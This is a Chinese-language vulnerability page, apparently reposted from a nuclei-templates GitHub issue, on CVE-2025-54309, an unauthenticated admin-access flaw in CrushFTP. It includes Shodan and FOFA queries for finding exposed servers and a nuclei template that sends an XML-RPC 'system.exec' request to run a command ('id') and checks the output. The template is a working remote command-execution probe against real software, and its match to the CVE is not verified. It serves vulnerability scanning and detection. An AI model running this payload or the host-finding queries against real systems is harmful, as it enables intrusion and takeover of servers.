CrushFTP - Unprotected Alternate Channel

漏洞信息

漏洞名称: CrushFTP - Unprotected Alternate Channel

漏洞编号:

  • CVE: CVE-2025-54309

漏洞类型: 未授权访问

漏洞等级: 严重

漏洞描述: CrushFTP是一款流行的文件传输协议(FTP)服务器软件,广泛用于企业环境中,支持多种文件传输协议,包括FTP、SFTP、HTTP和HTTPS等。它提供了Web界面管理功能,便于用户远程管理文件传输服务。该软件在企业级服务中部署广泛,因其功能强大和易于使用而受到青睐。

该漏洞属于未授权访问类型,技术根源在于CrushFTP在未使用DMZ代理功能时,错误处理了AS2验证,导致远程攻击者可以通过HTTPS协议获得管理员访问权限。这一漏洞的利用无需认证,攻击者可以直接通过网络发起攻击,获取服务器的完全控制权。

此漏洞的安全影响极为严重,攻击者可以利用此漏洞远程获取管理员权限,进而完全控制CrushFTP服务器。这意味着攻击者可以访问、修改或删除服务器上的任何文件,甚至可以利用服务器作为跳板进一步攻击内部网络。由于该漏洞的利用无需用户交互,且攻击代码已经在野外被发现利用,因此对所有受影响版本的CrushFTP服务器构成了严重威胁。建议用户立即升级到10.8.5、11.3.4_23或更高版本以修复此漏洞。

产品厂商: crushftp

产品名称: CrushFTP

影响版本: 10 before 10.8.5 and 11 before 11.3.4_23

搜索语法: http.html:”crushftp” title:”CrushFTP - Login” title:”CrushFTP WebInterface” http.favicon.hash:-675750811 http.favicon.hash:-1022206565 http.favicon.hash:838835539 “Server: CrushFTP HTTP Server”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/7ab25befca79462095b413c7e83c4d7ea6cfdc77/CVE-2025-54309.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

id: CVE-2025-54309

info:
  name: CrushFTP - Unprotected Alternate Channel
  author: ANshu Bind
  severity: critical
  description: |
    CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
  impact: |
    Remote attackers can gain administrative access, leading to full control over the CrushFTP server.
  remediation: |
    Update to version 10.8.5, 11.3.4_23 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss_score: 9
    cve-id: CVE-2025-54309
    cwe-id: CWE-420
    epss-score: 0.07464
    epss-percentile: 0.91328
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    vendor: crushftp
    product: crushftp
    shodan-query:
      - http.html:"crushftp"
      - title:"CrushFTP - Login"
      - title:"CrushFTP WebInterface"
      - http.favicon.hash:-675750811
      - http.favicon.hash:-1022206565
      - http.favicon.hash:838835539
      - "Server: CrushFTP HTTP Server"
    fofa-query:
      - body="crushftp"
      - title="CrushFTP - Login"
      - title="CrushFTP WebInterface"
      - icon_hash="-675750811"
      - icon_hash="-1022206565"
      - icon_hash="838835539"
      - "Server: CrushFTP HTTP Server"
  reference:
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54309
    - https://github.com/advisories/GHSA-rh5q-v9ww-rqgm
    - https://github.com/issamjr/CVE-2025-54309-EXPLOIT
  tags: cve,cve2025,crushftp,rce,unauthenticated

variables:
  cmd: "id"

http:
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/"
    
    headers:
      Content-Type: application/xml
    
    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.exec</methodName>
        <params>
          <param>
            <value>
              <string>{{cmd}}</string>
            </value>
          </param>
        </params>
      </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
CrushFTP - Unprotected Alternate Channel
http://example.com/2025/07/27/github_3710220901/
作者
lianccc
发布于
2025年7月27日
许可协议